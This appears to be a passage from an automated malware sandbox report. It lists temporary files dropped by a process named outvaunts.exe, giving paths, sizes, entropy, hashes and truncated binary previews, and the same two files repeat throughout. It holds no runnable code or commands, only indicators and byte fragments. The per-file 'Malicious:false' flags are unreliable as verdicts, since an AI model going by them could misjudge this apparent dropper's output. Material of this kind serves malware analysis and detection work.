                                                    Preview:EA06......4.Z.B.E...T.n.a9..T...U.M&Uj.J.N.Mk@....x.Q......f...z.0..)..\..K......z.f...)-..U.N..imF.4..,.y5.}G.D*....d...U..r.W.\....}}..w...z..../E8.F.?..?s<..4.xo.iN.Fv9k.+K........Q4..7....f6{8^ow.{y......h...^..b.nr7.......7p_^.G...=0?w..t.p.q....o...q....*......-Y.3*.Z.S.V.........NsJ...SY..ev...V.]..5....i..qr....!..eV....U..4.,.&.R.S.K10.V.Ujt.kZ..-5*d....8.V...V.P.Q...d.....| 0..E..(T...m9...|..f.gC..<...T.Y....k5.U.p...:=A..&...~'7.L% ..e7.T@..D..@%...X......N.4.M.....Q...|.....1..*`...&.x..Zh...<|...[....dRp....<+ %...x...>......M*.Y..eK.....$.Z.........u...@<>......0.....U.eF.d..y..M...m.|\....i.S..BY...ZJM.g9.dq}.U...N.Ui..u..wg..=...C;S.............U.Ui7...k 1...+.L0..}....J.Ju..o.Q..j...Co.Zgj.?...].=.o...&.(~g...].*...5...z7bs{.._J.K.\.]j.*..0..'../wWe...<.....n9.I.ru;.Z3.p.._5.P.wZ7c.|.L.rZ.^...Ej..^W.Gj...B.K.wY.....M...f....s...E.z..s@...O..\&...ni2.Gg.:wb.}..#.o.....U...E..i..-RI.2E...{..m2e..."....!4.C>..Z;R.C..Z..C(.P.

                                                    C:\Users\user\AppData\Local\Temp\autE199.tmp

                                                    Download File
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):14748
                                                    Entropy (8bit):7.621191303647537
                                                    Encrypted:false
                                                    SSDEEP:384:pTYznw85HhH2x2ZHDYn8oj/rFwGn1TFioPl:pAw83kCmPjJwG1jl
                                                    MD5:F6FD31D1FA46BDE50DC3C6A4A25228FF
                                                    SHA1:8D032538C2D78C4524A7AC91F71EA241653F6EC2
                                                    SHA-256:29EA00B8682E7C041C9545B37768B8A46E49D45B9B12272C56482B0641F17679
                                                    SHA-512:9F890F3F32B82997586DAA68DFA8FF2F60B2B2CCC5F981A96C3631A608896760BFA16811C9DDF741900F9BE097B93C5CE1DC4B36868F449F798386266C984FE3
                                                    Malicious:false
                                                    Preview:EA06..D..Y&.y..+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...

                                                    C:\Users\user\AppData\Local\Temp\autE56F.tmp

                                                    Download File
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):435344
                                                    Entropy (8bit):7.985285570664101
                                                    Encrypted:false
                                                    SSDEEP:12288:oZL9vHLfSDwwn/e/p+ODRJSKLsOOTuFXqXHd:o15HLSDh/Yp+ODRLbH8Hd
                                                    MD5:3F524A7F28B5AED776676A99EE1B7A67
                                                    SHA1:0E475D260EF5B7D3C66F38F94ABCA739FD1DB608
                                                    SHA-256:9315316D663AB61E13730C807F2F74B79588796C87353AA084500FEDF2E7E4F2
                                                    SHA-512:6C317C04A10EF103CE572FE3902CA007308DF4A300F617BA4298EE965026B85BBD470B67ED55919237102F10DD0B3BFBDC47D1EB2DC6ADDC443F412FE79BFFD7
                                                    Malicious:false
                                                    Preview:EA06......4.Z.B.E...T.n.a9..T...U.M&Uj.J.N.Mk@....x.Q......f...z.0..)..\..K......z.f...)-..U.N..imF.4..,.y5.}G.D*....d...U..r.W.\....}}..w...z..../E8.F.?..?s<..4.xo.iN.Fv9k.+K........Q4..7....f6{8^ow.{y......h...^..b.nr7.......7p_^.G...=0?w..t.p.q....o...q....*......-Y.3*.Z.S.V.........NsJ...SY..ev...V.]..5....i..qr....!..eV....U..4.,.&.R.S.K10.V.Ujt.kZ..-5*d....8.V...V.P.Q...d.....| 0..E..(T...m9...|..f.gC..<...T.Y....k5.U.p...:=A..&...~'7.L% ..e7.T@..D..@%...X......N.4.M.....Q...|.....1..*`...&.x..Zh...<|...[....dRp....<+ %...x...>......M*.Y..eK.....$.Z.........u...@<>......0.....U.eF.d..y..M...m.|\....i.S..BY...ZJM.g9.dq}.U...N.Ui..u..wg..=...C;S.............U.Ui7...k 1...+.L0..}....J.Ju..o.Q..j...Co.Zgj.?...].=.o...&.(~g...].*...5...z7bs{.._J.K.\.]j.*..0..'../wWe...<.....n9.I.ru;.Z3.p.._5.P.wZ7c.|.L.rZ.^...Ej..^W.Gj...B.K.wY.....M...f....s...E.z..s@...O..\&...ni2.Gg.:wb.}..#.o.....U...E..i..-RI.2E...{..m2e..."....!4.C>..Z;R.C..Z..C(.P.

                                                    C:\Users\user\AppData\Local\Temp\autE5CE.tmp

                                                    Download File
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):14748
                                                    Entropy (8bit):7.621191303647537
                                                    Encrypted:false
                                                    SSDEEP:384:pTYznw85HhH2x2ZHDYn8oj/rFwGn1TFioPl:pAw83kCmPjJwG1jl
                                                    MD5:F6FD31D1FA46BDE50DC3C6A4A25228FF
                                                    SHA1:8D032538C2D78C4524A7AC91F71EA241653F6EC2
                                                    SHA-256:29EA00B8682E7C041C9545B37768B8A46E49D45B9B12272C56482B0641F17679
                                                    SHA-512:9F890F3F32B82997586DAA68DFA8FF2F60B2B2CCC5F981A96C3631A608896760BFA16811C9DDF741900F9BE097B93C5CE1DC4B36868F449F798386266C984FE3
                                                    Malicious:false
                                                    Preview:EA06..D..Y&.y..+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...

                                                    C:\Users\user\AppData\Local\Temp\autE85C.tmp

                                                    Download File
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):435344
                                                    Entropy (8bit):7.985285570664101
                                                    Encrypted:false
                                                    SSDEEP:12288:oZL9vHLfSDwwn/e/p+ODRJSKLsOOTuFXqXHd:o15HLSDh/Yp+ODRLbH8Hd
                                                    MD5:3F524A7F28B5AED776676A99EE1B7A67
                                                    SHA1:0E475D260EF5B7D3C66F38F94ABCA739FD1DB608
                                                    SHA-256:9315316D663AB61E13730C807F2F74B79588796C87353AA084500FEDF2E7E4F2
                                                    SHA-512:6C317C04A10EF103CE572FE3902CA007308DF4A300F617BA4298EE965026B85BBD470B67ED55919237102F10DD0B3BFBDC47D1EB2DC6ADDC443F412FE79BFFD7
                                                    Malicious:false
                                                    Preview:EA06......4.Z.B.E...T.n.a9..T...U.M&Uj.J.N.Mk@....x.Q......f...z.0..)..\..K......z.f...)-..U.N..imF.4..,.y5.}G.D*....d...U..r.W.\....}}..w...z..../E8.F.?..?s<..4.xo.iN.Fv9k.+K........Q4..7....f6{8^ow.{y......h...^..b.nr7.......7p_^.G...=0?w..t.p.q....o...q....*......-Y.3*.Z.S.V.........NsJ...SY..ev...V.]..5....i..qr....!..eV....U..4.,.&.R.S.K10.V.Ujt.kZ..-5*d....8.V...V.P.Q...d.....| 0..E..(T...m9...|..f.gC..<...T.Y....k5.U.p...:=A..&...~'7.L% ..e7.T@..D..@%...X......N.4.M.....Q...|.....1..*`...&.x..Zh...<|...[....dRp....<+ %...x...>......M*.Y..eK.....$.Z.........u...@<>......0.....U.eF.d..y..M...m.|\....i.S..BY...ZJM.g9.dq}.U...N.Ui..u..wg..=...C;S.............U.Ui7...k 1...+.L0..}....J.Ju..o.Q..j...Co.Zgj.?...].=.o...&.(~g...].*...5...z7bs{.._J.K.\.]j.*..0..'../wWe...<.....n9.I.ru;.Z3.p.._5.P.wZ7c.|.L.rZ.^...Ej..^W.Gj...B.K.wY.....M...f....s...E.z..s@...O..\&...ni2.Gg.:wb.}..#.o.....U...E..i..-RI.2E...{..m2e..."....!4.C>..Z;R.C..Z..C(.P.

                                                    C:\Users\user\AppData\Local\Temp\autE8CA.tmp

                                                    Download File
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):14748
                                                    Entropy (8bit):7.621191303647537
                                                    Encrypted:false
                                                    SSDEEP:384:pTYznw85HhH2x2ZHDYn8oj/rFwGn1TFioPl:pAw83kCmPjJwG1jl
                                                    MD5:F6FD31D1FA46BDE50DC3C6A4A25228FF
                                                    SHA1:8D032538C2D78C4524A7AC91F71EA241653F6EC2
                                                    SHA-256:29EA00B8682E7C041C9545B37768B8A46E49D45B9B12272C56482B0641F17679
                                                    SHA-512:9F890F3F32B82997586DAA68DFA8FF2F60B2B2CCC5F981A96C3631A608896760BFA16811C9DDF741900F9BE097B93C5CE1DC4B36868F449F798386266C984FE3
                                                    Malicious:false
                                                    Preview:EA06..D..Y&.y..+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...

                                                    C:\Users\user\AppData\Local\Temp\autEB68.tmp

                                                    Download File
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):435344
                                                    Entropy (8bit):7.985285570664101
                                                    Encrypted:false
                                                    SSDEEP:12288:oZL9vHLfSDwwn/e/p+ODRJSKLsOOTuFXqXHd:o15HLSDh/Yp+ODRLbH8Hd
                                                    MD5:3F524A7F28B5AED776676A99EE1B7A67
                                                    SHA1:0E475D260EF5B7D3C66F38F94ABCA739FD1DB608
                                                    SHA-256:9315316D663AB61E13730C807F2F74B79588796C87353AA084500FEDF2E7E4F2
                                                    SHA-512:6C317C04A10EF103CE572FE3902CA007308DF4A300F617BA4298EE965026B85BBD470B67ED55919237102F10DD0B3BFBDC47D1EB2DC6ADDC443F412FE79BFFD7
                                                    Malicious:false
                                                    Preview:EA06......4.Z.B.E...T.n.a9..T...U.M&Uj.J.N.Mk@....x.Q......f...z.0..)..\..K......z.f...)-..U.N..imF.4..,.y5.}G.D*....d...U..r.W.\....}}..w...z..../E8.F.?..?s<..4.xo.iN.Fv9k.+K........Q4..7....f6{8^ow.{y......h...^..b.nr7.......7p_^.G...=0?w..t.p.q....o...q....*......-Y.3*.Z.S.V.........NsJ...SY..ev...V.]..5....i..qr....!..eV....U..4.,.&.R.S.K10.V.Ujt.kZ..-5*d....8.V...V.P.Q...d.....| 0..E..(T...m9...|..f.gC..<...T.Y....k5.U.p...:=A..&...~'7.L% ..e7.T@..D..@%...X......N.4.M.....Q...|.....1..*`...&.x..Zh...<|...[....dRp....<+ %...x...>......M*.Y..eK.....$.Z.........u...@<>......0.....U.eF.d..y..M...m.|\....i.S..BY...ZJM.g9.dq}.U...N.Ui..u..wg..=...C;S.............U.Ui7...k 1...+.L0..}....J.Ju..o.Q..j...Co.Zgj.?...].=.o...&.(~g...].*...5...z7bs{.._J.K.\.]j.*..0..'../wWe...<.....n9.I.ru;.Z3.p.._5.P.wZ7c.|.L.rZ.^...Ej..^W.Gj...B.K.wY.....M...f....s...E.z..s@...O..\&...ni2.Gg.:wb.}..#.o.....U...E..i..-RI.2E...{..m2e..."....!4.C>..Z;R.C..Z..C(.P.

                                                    C:\Users\user\AppData\Local\Temp\autEBD6.tmp

                                                    Download File
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):14748
                                                    Entropy (8bit):7.621191303647537
                                                    Encrypted:false
                                                    SSDEEP:384:pTYznw85HhH2x2ZHDYn8oj/rFwGn1TFioPl:pAw83kCmPjJwG1jl
                                                    MD5:F6FD31D1FA46BDE50DC3C6A4A25228FF
                                                    SHA1:8D032538C2D78C4524A7AC91F71EA241653F6EC2
                                                    SHA-256:29EA00B8682E7C041C9545B37768B8A46E49D45B9B12272C56482B0641F17679
                                                    SHA-512:9F890F3F32B82997586DAA68DFA8FF2F60B2B2CCC5F981A96C3631A608896760BFA16811C9DDF741900F9BE097B93C5CE1DC4B36868F449F798386266C984FE3
                                                    Malicious:false
                                                    Preview:EA06..D..Y&.y..+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...

                                                    C:\Users\user\AppData\Local\Temp\autEEA3.tmp

                                                    Download File
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):435344
                                                    Entropy (8bit):7.985285570664101
                                                    Encrypted:false
                                                    SSDEEP:12288:oZL9vHLfSDwwn/e/p+ODRJSKLsOOTuFXqXHd:o15HLSDh/Yp+ODRLbH8Hd
                                                    MD5:3F524A7F28B5AED776676A99EE1B7A67
                                                    SHA1:0E475D260EF5B7D3C66F38F94ABCA739FD1DB608
                                                    SHA-256:9315316D663AB61E13730C807F2F74B79588796C87353AA084500FEDF2E7E4F2
                                                    SHA-512:6C317C04A10EF103CE572FE3902CA007308DF4A300F617BA4298EE965026B85BBD470B67ED55919237102F10DD0B3BFBDC47D1EB2DC6ADDC443F412FE79BFFD7
                                                    Malicious:false
                                                    Preview:EA06......4.Z.B.E...T.n.a9..T...U.M&Uj.J.N.Mk@....x.Q......f...z.0..)..\..K......z.f...)-..U.N..imF.4..,.y5.}G.D*....d...U..r.W.\....}}..w...z..../E8.F.?..?s<..4.xo.iN.Fv9k.+K........Q4..7....f6{8^ow.{y......h...^..b.nr7.......7p_^.G...=0?w..t.p.q....o...q....*......-Y.3*.Z.S.V.........NsJ...SY..ev...V.]..5....i..qr....!..eV....U..4.,.&.R.S.K10.V.Ujt.kZ..-5*d....8.V...V.P.Q...d.....| 0..E..(T...m9...|..f.gC..<...T.Y....k5.U.p...:=A..&...~'7.L% ..e7.T@..D..@%...X......N.4.M.....Q...|.....1..*`...&.x..Zh...<|...[....dRp....<+ %...x...>......M*.Y..eK.....$.Z.........u...@<>......0.....U.eF.d..y..M...m.|\....i.S..BY...ZJM.g9.dq}.U...N.Ui..u..wg..=...C;S.............U.Ui7...k 1...+.L0..}....J.Ju..o.Q..j...Co.Zgj.?...].=.o...&.(~g...].*...5...z7bs{.._J.K.\.]j.*..0..'../wWe...<.....n9.I.ru;.Z3.p.._5.P.wZ7c.|.L.rZ.^...Ej..^W.Gj...B.K.wY.....M...f....s...E.z..s@...O..\&...ni2.Gg.:wb.}..#.o.....U...E..i..-RI.2E...{..m2e..."....!4.C>..Z;R.C..Z..C(.P.

                                                    C:\Users\user\AppData\Local\Temp\autEEF2.tmp

                                                    Download File
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):14748
                                                    Entropy (8bit):7.621191303647537
                                                    Encrypted:false
                                                    SSDEEP:384:pTYznw85HhH2x2ZHDYn8oj/rFwGn1TFioPl:pAw83kCmPjJwG1jl
                                                    MD5:F6FD31D1FA46BDE50DC3C6A4A25228FF
                                                    SHA1:8D032538C2D78C4524A7AC91F71EA241653F6EC2
                                                    SHA-256:29EA00B8682E7C041C9545B37768B8A46E49D45B9B12272C56482B0641F17679
                                                    SHA-512:9F890F3F32B82997586DAA68DFA8FF2F60B2B2CCC5F981A96C3631A608896760BFA16811C9DDF741900F9BE097B93C5CE1DC4B36868F449F798386266C984FE3
                                                    Malicious:false
                                                    Preview:EA06..D..Y&.y..+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...

                                                    C:\Users\user\AppData\Local\Temp\autEFE.tmp

                                                    Download File
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):435344
                                                    Entropy (8bit):7.985285570664101
                                                    Encrypted:false
                                                    SSDEEP:12288:oZL9vHLfSDwwn/e/p+ODRJSKLsOOTuFXqXHd:o15HLSDh/Yp+ODRLbH8Hd
                                                    MD5:3F524A7F28B5AED776676A99EE1B7A67
                                                    SHA1:0E475D260EF5B7D3C66F38F94ABCA739FD1DB608
                                                    SHA-256:9315316D663AB61E13730C807F2F74B79588796C87353AA084500FEDF2E7E4F2
                                                    SHA-512:6C317C04A10EF103CE572FE3902CA007308DF4A300F617BA4298EE965026B85BBD470B67ED55919237102F10DD0B3BFBDC47D1EB2DC6ADDC443F412FE79BFFD7
                                                    Malicious:false
                                                    Preview:EA06......4.Z.B.E...T.n.a9..T...U.M&Uj.J.N.Mk@....x.Q......f...z.0..)..\..K......z.f...)-..U.N..imF.4..,.y5.}G.D*....d...U..r.W.\....}}..w...z..../E8.F.?..?s<..4.xo.iN.Fv9k.+K........Q4..7....f6{8^ow.{y......h...^..b.nr7.......7p_^.G...=0?w..t.p.q....o...q....*......-Y.3*.Z.S.V.........NsJ...SY..ev...V.]..5....i..qr....!..eV....U..4.,.&.R.S.K10.V.Ujt.kZ..-5*d....8.V...V.P.Q...d.....| 0..E..(T...m9...|..f.gC..<...T.Y....k5.U.p...:=A..&...~'7.L% ..e7.T@..D..@%...X......N.4.M.....Q...|.....1..*`...&.x..Zh...<|...[....dRp....<+ %...x...>......M*.Y..eK.....$.Z.........u...@<>......0.....U.eF.d..y..M...m.|\....i.S..BY...ZJM.g9.dq}.U...N.Ui..u..wg..=...C;S.............U.Ui7...k 1...+.L0..}....J.Ju..o.Q..j...Co.Zgj.?...].=.o...&.(~g...].*...5...z7bs{.._J.K.\.]j.*..0..'../wWe...<.....n9.I.ru;.Z3.p.._5.P.wZ7c.|.L.rZ.^...Ej..^W.Gj...B.K.wY.....M...f....s...E.z..s@...O..\&...ni2.Gg.:wb.}..#.o.....U...E..i..-RI.2E...{..m2e..."....!4.C>..Z;R.C..Z..C(.P.

                                                    C:\Users\user\AppData\Local\Temp\autEFF.tmp

                                                    Download File
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):435344
                                                    Entropy (8bit):7.985285570664101
                                                    Encrypted:false
                                                    SSDEEP:12288:oZL9vHLfSDwwn/e/p+ODRJSKLsOOTuFXqXHd:o15HLSDh/Yp+ODRLbH8Hd
                                                    MD5:3F524A7F28B5AED776676A99EE1B7A67
                                                    SHA1:0E475D260EF5B7D3C66F38F94ABCA739FD1DB608
                                                    SHA-256:9315316D663AB61E13730C807F2F74B79588796C87353AA084500FEDF2E7E4F2
                                                    SHA-512:6C317C04A10EF103CE572FE3902CA007308DF4A300F617BA4298EE965026B85BBD470B67ED55919237102F10DD0B3BFBDC47D1EB2DC6ADDC443F412FE79BFFD7
                                                    Malicious:false
                                                    Preview:EA06......4.Z.B.E...T.n.a9..T...U.M&Uj.J.N.Mk@....x.Q......f...z.0..)..\..K......z.f...)-..U.N..imF.4..,.y5.}G.D*....d...U..r.W.\....}}..w...z..../E8.F.?..?s<..4.xo.iN.Fv9k.+K........Q4..7....f6{8^ow.{y......h...^..b.nr7.......7p_^.G...=0?w..t.p.q....o...q....*......-Y.3*.Z.S.V.........NsJ...SY..ev...V.]..5....i..qr....!..eV....U..4.,.&.R.S.K10.V.Ujt.kZ..-5*d....8.V...V.P.Q...d.....| 0..E..(T...m9...|..f.gC..<...T.Y....k5.U.p...:=A..&...~'7.L% ..e7.T@..D..@%...X......N.4.M.....Q...|.....1..*`...&.x..Zh...<|...[....dRp....<+ %...x...>......M*.Y..eK.....$.Z.........u...@<>......0.....U.eF.d..y..M...m.|\....i.S..BY...ZJM.g9.dq}.U...N.Ui..u..wg..=...C;S.............U.Ui7...k 1...+.L0..}....J.Ju..o.Q..j...Co.Zgj.?...].=.o...&.(~g...].*...5...z7bs{.._J.K.\.]j.*..0..'../wWe...<.....n9.I.ru;.Z3.p.._5.P.wZ7c.|.L.rZ.^...Ej..^W.Gj...B.K.wY.....M...f....s...E.z..s@...O..\&...ni2.Gg.:wb.}..#.o.....U...E..i..-RI.2E...{..m2e..."....!4.C>..Z;R.C..Z..C(.P.

                                                    C:\Users\user\AppData\Local\Temp\autF20C.tmp

                                                    Download File
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):435344
                                                    Entropy (8bit):7.985285570664101
                                                    Encrypted:false
                                                    SSDEEP:12288:oZL9vHLfSDwwn/e/p+ODRJSKLsOOTuFXqXHd:o15HLSDh/Yp+ODRLbH8Hd
                                                    MD5:3F524A7F28B5AED776676A99EE1B7A67
                                                    SHA1:0E475D260EF5B7D3C66F38F94ABCA739FD1DB608
                                                    SHA-256:9315316D663AB61E13730C807F2F74B79588796C87353AA084500FEDF2E7E4F2
                                                    SHA-512:6C317C04A10EF103CE572FE3902CA007308DF4A300F617BA4298EE965026B85BBD470B67ED55919237102F10DD0B3BFBDC47D1EB2DC6ADDC443F412FE79BFFD7
                                                    Malicious:false
                                                    Preview:EA06......4.Z.B.E...T.n.a9..T...U.M&Uj.J.N.Mk@....x.Q......f...z.0..)..\..K......z.f...)-..U.N..imF.4..,.y5.}G.D*....d...U..r.W.\....}}..w...z..../E8.F.?..?s<..4.xo.iN.Fv9k.+K........Q4..7....f6{8^ow.{y......h...^..b.nr7.......7p_^.G...=0?w..t.p.q....o...q....*......-Y.3*.Z.S.V.........NsJ...SY..ev...V.]..5....i..qr....!..eV....U..4.,.&.R.S.K10.V.Ujt.kZ..-5*d....8.V...V.P.Q...d.....| 0..E..(T...m9...|..f.gC..<...T.Y....k5.U.p...:=A..&...~'7.L% ..e7.T@..D..@%...X......N.4.M.....Q...|.....1..*`...&.x..Zh...<|...[....dRp....<+ %...x...>......M*.Y..eK.....$.Z.........u...@<>......0.....U.eF.d..y..M...m.|\....i.S..BY...ZJM.g9.dq}.U...N.Ui..u..wg..=...C;S.............U.Ui7...k 1...+.L0..}....J.Ju..o.Q..j...Co.Zgj.?...].=.o...&.(~g...].*...5...z7bs{.._J.K.\.]j.*..0..'../wWe...<.....n9.I.ru;.Z3.p.._5.P.wZ7c.|.L.rZ.^...Ej..^W.Gj...B.K.wY.....M...f....s...E.z..s@...O..\&...ni2.Gg.:wb.}..#.o.....U...E..i..-RI.2E...{..m2e..."....!4.C>..Z;R.C..Z..C(.P.

                                                    C:\Users\user\AppData\Local\Temp\autF2B8.tmp

                                                    Download File
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):435344
                                                    Entropy (8bit):7.985285570664101
                                                    Encrypted:false
                                                    SSDEEP:12288:oZL9vHLfSDwwn/e/p+ODRJSKLsOOTuFXqXHd:o15HLSDh/Yp+ODRLbH8Hd
                                                    MD5:3F524A7F28B5AED776676A99EE1B7A67
                                                    SHA1:0E475D260EF5B7D3C66F38F94ABCA739FD1DB608
                                                    SHA-256:9315316D663AB61E13730C807F2F74B79588796C87353AA084500FEDF2E7E4F2
                                                    SHA-512:6C317C04A10EF103CE572FE3902CA007308DF4A300F617BA4298EE965026B85BBD470B67ED55919237102F10DD0B3BFBDC47D1EB2DC6ADDC443F412FE79BFFD7
                                                    Malicious:false
                                                    Preview:EA06......4.Z.B.E...T.n.a9..T...U.M&Uj.J.N.Mk@....x.Q......f...z.0..)..\..K......z.f...)-..U.N..imF.4..,.y5.}G.D*....d...U..r.W.\....}}..w...z..../E8.F.?..?s<..4.xo.iN.Fv9k.+K........Q4..7....f6{8^ow.{y......h...^..b.nr7.......7p_^.G...=0?w..t.p.q....o...q....*......-Y.3*.Z.S.V.........NsJ...SY..ev...V.]..5....i..qr....!..eV....U..4.,.&.R.S.K10.V.Ujt.kZ..-5*d....8.V...V.P.Q...d.....| 0..E..(T...m9...|..f.gC..<...T.Y....k5.U.p...:=A..&...~'7.L% ..e7.T@..D..@%...X......N.4.M.....Q...|.....1..*`...&.x..Zh...<|...[....dRp....<+ %...x...>......M*.Y..eK.....$.Z.........u...@<>......0.....U.eF.d..y..M...m.|\....i.S..BY...ZJM.g9.dq}.U...N.Ui..u..wg..=...C;S.............U.Ui7...k 1...+.L0..}....J.Ju..o.Q..j...Co.Zgj.?...].=.o...&.(~g...].*...5...z7bs{.._J.K.\.]j.*..0..'../wWe...<.....n9.I.ru;.Z3.p.._5.P.wZ7c.|.L.rZ.^...Ej..^W.Gj...B.K.wY.....M...f....s...E.z..s@...O..\&...ni2.Gg.:wb.}..#.o.....U...E..i..-RI.2E...{..m2e..."....!4.C>..Z;R.C..Z..C(.P.

                                                    C:\Users\user\AppData\Local\Temp\autF307.tmp

                                                    Download File
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):14748
                                                    Entropy (8bit):7.621191303647537
                                                    Encrypted:false
                                                    SSDEEP:384:pTYznw85HhH2x2ZHDYn8oj/rFwGn1TFioPl:pAw83kCmPjJwG1jl
                                                    MD5:F6FD31D1FA46BDE50DC3C6A4A25228FF
                                                    SHA1:8D032538C2D78C4524A7AC91F71EA241653F6EC2
                                                    SHA-256:29EA00B8682E7C041C9545B37768B8A46E49D45B9B12272C56482B0641F17679
                                                    SHA-512:9F890F3F32B82997586DAA68DFA8FF2F60B2B2CCC5F981A96C3631A608896760BFA16811C9DDF741900F9BE097B93C5CE1DC4B36868F449F798386266C984FE3
                                                    Malicious:false
